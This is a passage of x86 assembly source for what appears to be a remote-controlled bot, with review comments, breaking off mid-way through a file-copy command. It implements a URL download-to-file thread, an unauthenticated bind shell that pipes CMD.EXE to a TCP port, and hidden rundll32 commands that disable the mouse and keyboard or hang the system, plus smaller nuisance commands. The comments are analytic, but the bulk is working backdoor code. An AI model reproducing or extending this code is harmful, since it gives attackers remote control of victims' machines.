push ebx
push 2000h
push eax
callb CreateThread
pop ecx
push eax
callb CloseHandle
__err: @retecx1
; ---------------------------------------------------------------------------
; bot_download_thread - worker thread behind the bot's download command
; (the CreateThread call that launches it is in the handler above, which
; starts before this listing).
;
; i: url = pointer to a heap buffer holding the NUL-terminated URL.  The
;         DWORD that follows the terminator is read as the destination file
;         handle (see the lodsd below).  This thread owns both: it frees the
;         buffer and closes the handle before exiting.
; o: nothing - the thread always ends in ExitThread(0)
;
; Behaviour: WinINet (InternetOpenA / InternetOpenUrlA) fetches the URL in
; chunks of at most 64000 bytes into a malloc'ed buffer and WriteFile()s
; each chunk to f_handle until InternetReadFile reports 0 bytes.  Failures
; fall through the __err_2 / __err_1 / __err labels so that whatever was
; opened before the failure is released.  An exception anywhere in the body
; lands in __dl_thread_xception, which just ends the thread (no cleanup).
;
; Security (analysis): this is a download-to-file primitive of a bot; the
; URL comes verbatim from the remote operator, there is no size limit on the
; download, and the malloc() result is not checked for NULL.
; ---------------------------------------------------------------------------
bot_download_thread proc pascal
arg url:DWORD
local f_handle                  ; destination file handle, taken from the arg buffer
local inet_handle               ; HINTERNET from InternetOpenA
local inet_rsrc                 ; HINTERNET from InternetOpenUrlA
local h_mem                     ; 64000-byte transfer buffer
@SEH_SetupFrame <jmp __dl_thread_xception>  ; any fault -> ExitThread (macro defined elsewhere)
call $+5
downdlta: pop ebx               ; ebx = delta base; "_DT" rebases the import references
_DT equ <-downdlta[ebx]>
mov esi, url
@endsz                          ; presumably advances esi past the URL's terminating NUL (macro not shown)
lodsd                           ; DWORD stored after the string = file handle to write to
mov f_handle, eax
x_push eax, <my cute GodzIIla rox~>   ; user-agent string built on the stack (never x_pop'ed; reclaimed by leave)
mov ecx, esp
xor eax, eax
push eax                        ; dwFlags = 0
push eax                        ; lpszProxyBypass = NULL
push eax                        ; lpszProxy = NULL
push INTERNET_OPEN_TYPE_DIRECT  ; no proxy
push ecx                        ; lpszAgent
call _InternetOpenA _DT
test eax, eax
jz __err                        ; nothing opened yet: only the file handle needs closing
mov inet_handle, eax
xor eax, eax
push eax                        ; dwContext = 0
push eax                        ; dwFlags = 0
push eax                        ; dwHeadersLength = 0
push eax                        ; lpszHeaders = NULL
push url
push inet_handle
call _InternetOpenUrlA _DT
xchg eax, ecx
jecxz __err_1                   ; NULL handle -> close the session only
mov inet_rsrc, ecx
mov eax, 64000
call malloc                     ; helper defined elsewhere; NOTE: result is not NULL-checked
mov h_mem, eax
__cycle: push edx               ; slot for lpdwNumberOfBytesAvailable
mov edx, esp
xor eax, eax
push eax                        ; dwContext = 0
push eax                        ; dwFlags = 0
push edx                        ; lpdwNumberOfBytesAvailable
push inet_rsrc
call _InternetQueryDataAvailable _DT
pop ecx                         ; ecx = bytes available
xchg eax, ecx
jecxz __err_2                   ; API returned FALSE
xchg eax, ecx
cmp ecx, 64000
jbe __read
mov ecx, 64000                  ; clamp the read to the buffer size
__read: push ecx                ; slot for lpdwNumberOfBytesRead
push esp
push ecx                        ; dwNumberOfBytesToRead (<= 64000)
push h_mem
push inet_rsrc
call _InternetReadFile _DT
pop ecx                         ; ecx = bytes actually read
xchg eax, ecx
jecxz __err_2                   ; API returned FALSE
xchg eax, ecx
jecxz __err_2                   ; 0 bytes read = end of data (normal exit from the loop)
push ecx                        ; slot for lpNumberOfBytesWritten
mov eax, esp
push 0                          ; lpOverlapped = NULL
push eax
push ecx                        ; nNumberOfBytesToWrite
push h_mem
push f_handle
call _WriteFile _DT
pop ecx
xchg eax, ecx
jecxnz __cycle                  ; macro, not a native instruction: presumably loops while WriteFile returned non-zero
__err_2: mov eax, h_mem
call free
push inet_rsrc
call _InternetCloseHandle _DT
__err_1: push inet_handle
call _InternetCloseHandle _DT
__err:
push f_handle
call _CloseHandle _DT
mov eax, url
call free                       ; the argument buffer is owned by this thread
leave                           ; also discards the user-agent string still on the stack
__dl_thread_xception: @SEH_RemoveFrame
push 0
call _ExitThread _DT
bot_download_thread endp
; ---------------------------------------------------------------------------
; !killmouse - runs "rundll32.exe mouse,disable" hidden
; i: nothing (the operator must be logged in: check_logged_in returns CF set)
; o: error ? ecx=0 : ecx!=0 (via @retecx1)
; NOTE(review): calling the MOUSE driver's disable entry through rundll32 is
; a Win9x-era trick; whether it does anything on NT-family Windows cannot be
; told from this listing.  WinExec's return value is not checked.
; ---------------------------------------------------------------------------
bot_cmd_killmouse: call check_logged_in
jnc err_not_logged_in           ; CF clear = not authenticated
x_push eax, <rundll32.exe mouse,disable~>  ; command line built on the stack ('~' presumably marks the NUL terminator)
mov eax, esp
push SW_HIDE                    ; uCmdShow
push eax                        ; lpCmdLine
callb WinExec                   ; callb: file-level import-call macro (not shown)
x_pop                           ; discard the stack string
@retecx1
; ---------------------------------------------------------------------------
; !killkeyb - runs "rundll32.exe keyboard,disable" hidden
; i: nothing (requires a logged-in operator)
; o: error ? ecx=0 : ecx!=0 (via @retecx1)
; Same mechanism as bot_cmd_killmouse, aimed at the KEYBOARD driver; the
; WinExec result is ignored.
; ---------------------------------------------------------------------------
bot_cmd_killkeyb: call check_logged_in
jnc err_not_logged_in           ; CF clear = not authenticated
x_push eax, <rundll32.exe keyboard,disable~>   ; command line on the stack
mov eax, esp
push SW_HIDE                    ; uCmdShow
push eax                        ; lpCmdLine
callb WinExec
x_pop                           ; free the stack string
@retecx1
; ---------------------------------------------------------------------------
; !syskill - runs "rundll32.exe user,disableoemlayer" hidden
; i: nothing (requires a logged-in operator)
; o: error ? ecx=0 : ecx!=0 (via @retecx1)
; NOTE(review): DisableOEMLayer lives in the 16-bit USER module; on Win9x it
; is known to tear down the display/input layer and effectively hang the
; machine (hence "syskill").  Not verifiable from this listing; the WinExec
; result is ignored.
; ---------------------------------------------------------------------------
bot_cmd_syskill: call check_logged_in
jnc err_not_logged_in           ; CF clear = not authenticated
x_push eax, <rundll32.exe user,disableoemlayer~>  ; command line on the stack
mov eax, esp
push SW_HIDE                    ; uCmdShow
push eax                        ; lpCmdLine
callb WinExec
x_pop                           ; free the stack string
@retecx1
; ---------------------------------------------------------------------------
; !minaw - minimises the current foreground window
; i: nothing (requires a logged-in operator)
; o: error ? ecx=0 : ecx!=0 (via @retecx1)
; The hwnd is not NULL-checked and the CloseWindow result is not examined.
; ---------------------------------------------------------------------------
bot_cmd_minaw: call check_logged_in
jnc err_not_logged_in           ; CF clear = not authenticated
callb GetForegroundWindow
xchg eax, esi                   ; esi = hwnd, kept across the IsIconic call
push esi
callb IsIconic
test eax, eax
jnz __minimyzed                 ; already minimised: nothing to do
push esi
callb CloseWindow               ; CloseWindow() minimises a window; despite its name it does not destroy it
__minimyzed: @retecx1
; ---------------------------------------------------------------------------
; !closecd - closes the CD-ROM tray via the MCI command string
;            "set CDAudio door closed"
; i: nothing (requires a logged-in operator)
; o: error ? ecx=0 : ecx!=0 (via @retecx1); the MCI result is ignored
; ---------------------------------------------------------------------------
bot_cmd_closecd: call check_logged_in
jnc err_not_logged_in           ; CF clear = not authenticated
x_push eax, <set CDAudio door closed~>   ; MCI command string on the stack
mov ecx, esp
xor eax, eax
push eax eax eax ecx            ; hwndCallback=0, cchReturn=0, lpszReturnString=NULL, lpszCommand
callb mciSendStringA
x_pop                           ; free the stack string
@retecx1
; ---------------------------------------------------------------------------
; !opencd - ejects the CD-ROM tray via the MCI command string
;           "set CDAudio door open"
; i: nothing (requires a logged-in operator)
; o: error ? ecx=0 : ecx!=0 (via @retecx1); the MCI result is ignored
; ---------------------------------------------------------------------------
bot_cmd_opencd: call check_logged_in
jnc err_not_logged_in           ; CF clear = not authenticated
x_push eax, <set CDAudio door open~>     ; MCI command string on the stack
mov ecx, esp
xor eax, eax
push eax eax eax ecx            ; hwndCallback=0, cchReturn=0, lpszReturnString=NULL, lpszCommand
callb mciSendStringA
x_pop                           ; free the stack string
@retecx1
; ---------------------------------------------------------------------------
; !closeaw - posts WM_QUIT to the foreground window
; i: nothing (requires a logged-in operator)
; o: error ? ecx=0 : ecx!=0 (via @retecx1)
; NOTE: WM_QUIT is delivered to the owning thread's message queue, so the
; application's message loop typically exits outright - this is not the
; graceful WM_CLOSE path and gives the target no chance to save.  The hwnd
; is not NULL-checked and the PostMessage result is ignored.
; ---------------------------------------------------------------------------
bot_cmd_closeaw: call check_logged_in
jnc err_not_logged_in           ; CF clear = not authenticated
callb GetForegroundWindow
xchg eax, esi                   ; esi = hwnd
xor eax, eax
push eax                        ; lParam = 0
push eax                        ; wParam = 0
push WM_QUIT
push esi
callb PostMessageA
@retecx1
; ---------------------------------------------------------------------------
; !beep <count> - calls MessageBeep(0FFFFFFFFh) <count> times
; i: ebx -> received command line; [ebx+6] is the first argument byte
;    (requires a logged-in operator)
; o: ecx!=0 - ecx is 0 on both exits of the loop and incremented to 1
; NOTE: <count> is not bounded; the operator controls how many iterations
; run.  What ascii2num returns for non-numeric text is not visible here.
; ---------------------------------------------------------------------------
bot_cmd_beep: call check_logged_in
jnc err_not_logged_in           ; CF clear = not authenticated
lea esi, [ebx+5+1]              ; skip "!beep" (5 bytes) plus the separating space
cmp byte ptr [esi], LF
jz err_cmd_syntax               ; no argument given
call patchcr                    ; presumably NUL-terminates the argument at the CR (helper not shown)
call ascii2num                  ; decimal text -> eax (helper not shown)
xchg eax, ecx
jecxz __end                     ; count 0: nothing to do
__1: push ecx                   ; ecx does not survive the API call
push -1                         ; uType = 0FFFFFFFFh = simple beep
callb MessageBeep
pop ecx
loop __1
__end: inc ecx                  ; ecx == 0 here on both paths -> 1 = success
ret
; ---------------------------------------------------------------------------
; !cleanclip - empties the system clipboard
; i: nothing (requires a logged-in operator)
; o: error ? ecx=0 : ecx!=0 (via @retecx1)
; None of the clipboard API results are checked; if OpenClipboard fails the
; EmptyClipboard/CloseClipboard calls simply fail too.
; ---------------------------------------------------------------------------
bot_cmd_cleanclip: call check_logged_in
jnc err_not_logged_in           ; CF clear = not authenticated
callb GetOpenClipboardWindow    ; hwnd that currently has the clipboard open, or NULL
push eax                        ; hWndNewOwner (NULL is accepted by the API)
callb OpenClipboard
callb EmptyClipboard
callb CloseClipboard
@retecx1
; ---------------------------------------------------------------------------
; displays a system-modal message box with the given title and message
; format: !msgbox "<msg>" "<title>"
; i: ebx -> received command line; [ebx+8] is the first argument byte
;    (requires a logged-in operator)
;
; o: error ? ecx=0 : ecx!=0
;
; Parsing: both arguments must be double-quoted and separated by exactly one
; space; the quotes and the trailing CR are overwritten with NUL in place so
; the two strings can be passed straight to MessageBoxA.  Every syntax error
; goes to err_cmd_syntax (via __err where a saved pointer must be dropped).
; NOTE(review): the first quoted string (esi) is pushed as lpCaption and the
; second (edi) as lpText - the reverse of the "<msg>" "<title>" order stated
; above.  Either this header or the push order is wrong; the code is the
; authority for what a running bot does.
; ---------------------------------------------------------------------------
bot_cmd_msgbox: call check_logged_in
jnc err_not_logged_in           ; CF clear = not authenticated
lea esi, [ebx+7+1]              ; skip "!msgbox" (7 bytes) plus the space
cmp byte ptr [esi], LF
jz err_cmd_syntax               ; no arguments at all
cmp byte ptr [esi], '"'
jnz err_cmd_syntax              ; first argument must open with a quote
inc esi
push esi                        ; [esp] = start of the first string
@endcr                          ; presumably advances esi just past the terminating CR (macro not shown)
and byte ptr [esi-1], 0         ; CR -> NUL
cmp byte ptr [esi-2], '"'
jnz __err                       ; line must end with the closing quote of the second string
and byte ptr [esi-2], 0         ; closing quote -> NUL
sub esi, [esp]
mov ecx, esi                    ; ecx = number of bytes to scan for the first closing quote
mov edx, ecx
mov edi, [esp]
mov al, '"'
repnz scasb                     ; locate the closing quote of the first string
pop esi                         ; esi = first string
jnz err_cmd_syntax              ; no closing quote within the line
and byte ptr [edi-1], 0         ; closing quote -> NUL (terminates the first string)
cmp word ptr [edi], '" '        ; MASM stores multi-char constants high byte first, so this matches ' ' then '"' in memory
jnz err_cmd_syntax
inc edi
inc edi                         ; edi = second string
push MB_SYSTEMMODAL             ; uType
push esi                        ; lpCaption = first string (see NOTE in the header)
push edi                        ; lpText = second string
push 0                          ; hWnd = NULL
callb MessageBoxA               ; modal: this thread blocks until the box is dismissed
jmp __end
__err: pop eax                  ; drop the saved string pointer before the common error exit
jmp err_cmd_syntax
__end: @retecx1
; ---------------------------------------------------------------------------
; spawns a shell listening on the specified TCP port (see bot_shell_thread)
; format: !spawn <port>   (the "!" prefix is implied by the [ebx+6+1] skip)
; i: ebx -> received command line; [ebx+7] is the first argument byte
;    (requires a logged-in operator)
;
; o: error ? ecx=0 : ecx!=0
;
; The listener runs in a new thread whose handle is closed immediately, so
; nothing in this handler tracks or stops the shell afterwards.  The port
; value is not range-checked here; bot_shell_thread keeps only its low 16
; bits (htons).
; ---------------------------------------------------------------------------
bot_cmd_spawn: call check_logged_in
jnc err_not_logged_in           ; CF clear = not authenticated
lea esi, [ebx+6+1]              ; skip "!spawn" (6 bytes) plus the space
cmp byte ptr [esi], LF
jz err_cmd_syntax               ; no argument given
call patchcr                    ; presumably NUL-terminates the argument at the CR (helper not shown)
call ascii2num                  ; port text -> eax (helper not shown)
xchg eax, ecx
jecxz __err                     ; port 0: no thread, but still exits through @retecx1
xor eax, eax
push eax                        ; receives the thread id
push esp                        ; lpThreadId
push eax                        ; dwCreationFlags = 0 (runs immediately)
push ecx ; thread param         ; lpParameter = port
lea ebx, bot_shell_thread X     ; lpStartAddress via the delta macro 'X' (not shown); overwrites ebx
push ebx
push 2000h                      ; dwStackSize
push eax                        ; lpThreadAttributes = NULL
callb CreateThread
pop edx                         ; drop the thread id slot
push eax
callb CloseHandle               ; thread handle closed at once (CloseHandle(NULL) on failure is harmless)
__err: @retecx1
; ---------------------------------------------------------------------------
; bot_shell_thread - bind-shell worker started by !spawn
; i: shell_port = TCP port (only the low 16 bits survive htons)
; o: nothing - the thread always ends in ExitThread(0)
;
; What the code below does:
;   1. creates two inheritable anonymous pipes (child stdin, child stdout+stderr)
;   2. socket/bind/listen on <first address resolved for gethostname()>:port
;      with SO_REUSEADDR, backlog 1, then accept()s exactly one client
;   3. starts COMMAND.COM or CMD.EXE (chosen by a CS-selector heuristic),
;      hidden, with its standard handles redirected to the pipes
;   4. pumps child stdout -> socket and socket -> child stdin until the child
;      exits, a pipe/socket call fails, or the peer closes the connection
;
; Security (analysis): nothing authenticates the TCP peer - whoever connects
; first gets the shell; check_logged_in only gates the !spawn command that
; starts this thread.  Binding to the resolved hostname address instead of
; INADDR_ANY means a multi-homed host exposes the shell on that one address.
; Register roles: ebx = 0 throughout (NULL/0 source), esi = delta base for
; the "sh" import references, edi -> the 512-byte local buffer.
; ---------------------------------------------------------------------------
bot_shell_thread proc pascal
arg shell_port:DWORD
local arg_end                   ; highest local: end marker of the zero-fill range
local wsocket                   ; accepted client socket
local lsocket                   ; listening socket
local processinfo:PROCESS_INFORMATION
local buffer:byte:512           ; hostname / pipe / socket transfer buffer
local read_handle_1             ; pipe 1 read end  -> child's stdin
local write_handle_1            ; pipe 1 write end -> we write what the peer sends
local read_handle_2             ; pipe 2 read end  -> we read the child's output
local write_handle_2            ; pipe 2 write end -> child's stdout and stderr
local arg_start                 ; lowest local: start marker of the zero-fill range
@SEH_SetupFrame <jmp __end_bot_shell>   ; any fault -> cleanup path (macro defined elsewhere)
lea edi, arg_start
lea ecx, arg_end
sub ecx, edi                    ; ecx = size of all locals between the two markers
xor eax, eax
cld
rep stosb                       ; zero every local so cleanup can close never-opened handles safely
lea edi, buffer
xchg eax, ebx                   ; ebx = 0 for the rest of the thread
call $+5
dshell: pop esi                 ; esi = delta base; "sh" rebases the import references
sh equ <-dshell[esi]>
lea eax, write_handle_1
lea ecx, read_handle_1
call __create_pipe              ; pipe 1: child reads, we write
jecxz __end
lea eax, write_handle_2
lea ecx, read_handle_2
call __create_pipe              ; pipe 2: child writes, we read
jecxz __end
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call _socket sh
mov lsocket, eax
inc eax
jz __end_bot_shell              ; INVALID_SOCKET (-1)
push 1                          ; optval = 1 (DWORD on the stack)
mov ecx, esp ; alloc optval ptr
push 4                          ; optlen
push ecx
push SO_REUSEADDR
push SOL_SOCKET
push lsocket
call _setsockopt sh
pop ecx ; free optval
test eax, eax
jnz __end_bot_shell             ; SOCKET_ERROR
push 512                        ; namelen = sizeof buffer
push edi ; buffer
call _gethostname sh
test eax, eax
jnz __end_bot_shell
push edi
call _gethostbyname sh
test eax, eax
jnz __1
__end: jmp __end_bot_shell      ; trampoline so the short jecxz/jz jumps can reach the cleanup
__1: mov eax, [eax.h_list]      ; hostent address list
mov eax, [eax]                  ; first entry only
push ebx ; alloc sockaddr       ; sin_zero[4..7]
push ebx                        ; sin_zero[0..3]
push dword ptr [eax]            ; sin_addr = first address resolved for our own hostname (not INADDR_ANY)
push shell_port
call _htons sh                  ; ax = port in network byte order; upper bits of shell_port are dropped
shl eax, 16
add al, AF_INET                 ; eax = sin_port:sin_family
push eax
mov ecx, esp                    ; ecx -> 16-byte sockaddr_in
push type sockaddr_in
push ecx
push lsocket
call _bind sh
add esp, 16                     ; free sockaddr_in
test eax, eax
jnz __end_bot_shell
push 1                          ; backlog 1: a single client is expected
push lsocket
call _listen sh
test eax, eax
jnz __end_bot_shell
push ebx                        ; addrlen = NULL
push ebx                        ; addr = NULL: the peer address is never examined
push lsocket
call _accept sh                 ; blocks until the first connection arrives
mov wsocket, eax
inc eax
jz __end_bot_shell              ; INVALID_SOCKET
; alloc STARTUPINFO: 68 bytes built on the stack, last field first
push write_handle_2 ; hStdError
push write_handle_2 ; hStdOutput
push read_handle_1 ; hStdInput
push ebx                        ; lpReserved2 = NULL (the original "; SW_HIDE" note belonged to the next push; both are 0)
push ebx                        ; wShowWindow = SW_HIDE (0), cbReserved2 = 0
push STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES   ; dwFlags
push 10
pop ecx
push ebx
loop $-1                        ; lpReserved .. dwFillAttribute: ten zero DWORDs
push 68                         ; cb = sizeof STARTUPINFO
mov edx, esp                    ; edx -> STARTUPINFO
mov ecx, cs
xor cl, cl                      ; keep only the high byte of the CS selector
jecxz __a                       ; zero high byte -> CMD.EXE (classic Win9x-vs-NT heuristic; NT in practice)
x_push ecx, COMMAND.COM~        ; non-zero high byte -> COMMAND.COM (Win9x)
jmp __b
__a: x_push ecx, CMD.EXE~
__b: mov ecx, esp               ; ecx -> command line string on the stack
lea eax, processinfo
push eax                        ; lpProcessInformation
push edx                        ; lpStartupInfo
push ebx                        ; lpCurrentDirectory = NULL
push ebx                        ; lpEnvironment = NULL
xchg eax, ecx                   ; park the string pointer in eax while ecx is reused for the CS test
mov ecx, cs
xor cl, cl
jecxz __c
push CREATE_NEW_CONSOLE         ; COMMAND.COM path: dwCreationFlags = CREATE_NEW_CONSOLE
jmp __d
__c: push ebx                   ; CMD.EXE path: dwCreationFlags = 0
__d: xchg eax, ecx
push 1                          ; bInheritHandles = TRUE so the child receives the pipe ends
push ebx                        ; lpThreadAttributes = NULL
push ebx                        ; lpProcessAttributes = NULL
push ecx                        ; lpCommandLine
push ebx                        ; lpApplicationName = NULL
call _CreateProcessA sh
add esp, _xsize + 68 ; free     ; command string (_xsize, from x_push) plus STARTUPINFO
test eax, eax
jz __end
pump_bot_shell: push ebx        ; slot for lpExitCode
push esp
push processinfo.PI_hProcess
call _GetExitCodeProcess sh
test eax, eax
pop eax                         ; eax = exit code (pop leaves the flags from test intact)
jz __end
cmp ax, STILL_ACTIVE            ; only the low 16 bits of the exit code are compared
jnz __end_bot_shell             ; the child shell has exited
push ebx                        ; slot for lpTotalBytesAvail
mov ecx, esp
push ebx                        ; lpBytesLeftThisMessage = NULL
push ecx                        ; lpTotalBytesAvail
push ebx                        ; lpBytesRead = NULL
push ebx                        ; nBufferSize = 0
push ebx                        ; lpBuffer = NULL
push read_handle_2
call _PeekNamedPipe sh          ; non-blocking probe of the child's output pipe
pop ecx                         ; ecx = bytes available
test eax, eax
jz __end_bot_shell
jecxz citaj_shell_socket        ; nothing from the child: look at the socket instead
mov eax, 512
cmp ecx, eax
jbe __overflow                  ; (label is misleading: this is the "fits in the buffer" path)
xchg eax, ecx                   ; more than 512 available: clamp the read to the buffer size
__overflow: push ebx            ; slot for lpNumberOfBytesRead
mov edx, esp
push ebx                        ; lpOverlapped = NULL
push edx
push ecx                        ; nNumberOfBytesToRead (<= 512)
push edi                        ; buffer
push read_handle_2
call _ReadFile sh
test eax, eax
pop eax                         ; eax = bytes read
jz __end_bot_shell
push ebx                        ; flags = 0
push eax                        ; len = bytes read
push edi
push wsocket
call _send sh                   ; forward the child's output to the peer
inc eax
jz __end_bot_shell              ; SOCKET_ERROR
jmp pump_bot_shell
citaj_shell_socket: push wsocket ; fd_set.fd_array[0]
push 1                          ; fd_set.fd_count = 1
mov eax, esp                    ; eax -> readfds
push 0                          ; tv_usec = 0
push 50                         ; tv_sec = 50
mov ecx, esp                    ; ecx -> timeval
xor ebx, ebx                    ; (ebx is already 0; harmless)
push ecx                        ; timeout
push ebx                        ; exceptfds = NULL
push ebx                        ; writefds = NULL
push eax                        ; readfds
push 1                          ; nfds (ignored by Winsock)
call _select sh                 ; waits up to 50 s for peer input; child output is not forwarded meanwhile
inc eax
jz __end_bot_shell              ; SOCKET_ERROR
dec eax
jz pump_bot_shell               ; timed out: go back to polling the child
push ebx                        ; flags = 0
push 512                        ; len = buffer size
push edi
push wsocket
call _recv sh
inc eax
jz __end_bot_shell              ; SOCKET_ERROR
dec eax
jz __end_bot_shell              ; 0 bytes = peer closed the connection
push ebx                        ; slot for lpNumberOfBytesWritten
push esp
push eax                        ; nNumberOfBytesToWrite = bytes received
push edi
push write_handle_1
call _WriteFile sh              ; feed the peer's input to the child's stdin
test eax, eax
jnz pump_bot_shell
__end_bot_shell: @SEH_RemoveFrame
; cleanup: all locals were zero-filled on entry, so closing a socket/handle
; that was never opened just fails harmlessly here
push wsocket
call _closesocket sh
push lsocket
call _closesocket sh
push processinfo.PI_hProcess
call _TerminateThread sh        ; NOTE(review): a process handle is passed to TerminateThread and only one of its two arguments is pushed; this call almost certainly fails, so the child shell can outlive the thread (TerminateProcess was presumably intended). The stdcall stack imbalance is absorbed by the leave below.
push write_handle_2
call _CloseHandle sh
push write_handle_1
call _CloseHandle sh
push read_handle_2
call _CloseHandle sh
push read_handle_1
call _CloseHandle sh
push processinfo.PI_hProcess
call _CloseHandle sh
push processinfo.PI_hThread
call _CloseHandle sh
leave
push 0
call _ExitThread sh
; ---------------------------------------------------------------------------
; __create_pipe - local helper: CreatePipe with an inheritable SECURITY_ATTRIBUTES
; i: eax -> DWORD receiving the write handle, ecx -> DWORD receiving the read
;    handle; ebx = 0, esi = delta base
; o: ecx = CreatePipe result (0 on failure, tested by the caller's jecxz); eax clobbered
; NOTE(review): both ends are created inheritable and never un-inherited with
; SetHandleInformation, so the child inherits the parent-side ends as well and
; pipe EOF is never signalled.  The pump loop above does not rely on EOF.
; ---------------------------------------------------------------------------
__create_pipe: push 1 ; alloc SECURITY_ATTRIBUTES   ; bInheritHandle = TRUE
push ebx                        ; lpSecurityDescriptor = NULL
push 12                         ; nLength = sizeof SECURITY_ATTRIBUTES
mov edx, esp
push ebx                        ; nSize = 0 (system default)
push edx                        ; lpPipeAttributes
push eax                        ; hWritePipe
push ecx                        ; hReadPipe
call _CreatePipe sh
add esp, 3*4 ; free SECURITY_ATTRIBUTES
xchg eax, ecx                   ; ecx = BOOL result
retn
bot_shell_thread endp
; ---------------------------------------------------------------------------
; copies specified file
; format: !copy <src> <dest>
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_copy: call check_logged_in
jnc err_not_logged_in
lea esi, [ebx+5+1]
cmp byte ptr [esi], LF
jz err_cmd_syntax
push esi
@endcr
and byte ptr [esi-1], 0
sub esi, [esp]
mov ecx, esi
mov edi, [esp]
mov al, ' '